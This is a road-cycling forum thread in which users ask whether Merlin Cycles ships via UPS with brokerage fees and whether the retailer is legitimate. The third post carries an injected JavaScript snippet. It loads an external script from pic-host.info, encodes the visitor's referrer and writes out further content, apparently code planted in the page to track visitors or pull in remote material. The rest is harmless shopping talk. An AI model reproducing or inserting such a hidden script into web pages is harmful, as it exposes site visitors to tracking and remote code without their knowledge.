Road Bike, Cycling Forums banner
1 - 14 of 14 Posts

·
Registered
17 Posts
I noticed with Merlin Cycles that when buying a group they use UPS to ship. Has anybody bought a group from them? Any issues, like brokerage fees etc? I am just afraid of those brokerage fees that UPS applies from time to time.

·
Registered
1,904 Posts
Is this site legit? I was checking it and they don't provide a USA address, phone number, their internet certificate links are broken (actually blank), ...
Those are enough red flags for me to steer clear. Even if it turns out to be legit, why make it so difficult to contact them? What if there is an issue?
Stick with one of the well-know, reviewed places.

·
Registered
255 Posts
Do a forum search on Planet Cyclery. See a previous posts on them.<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
Thanks, I was wondering the same. Looks like they are legit, may order from them.

1 - 14 of 14 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.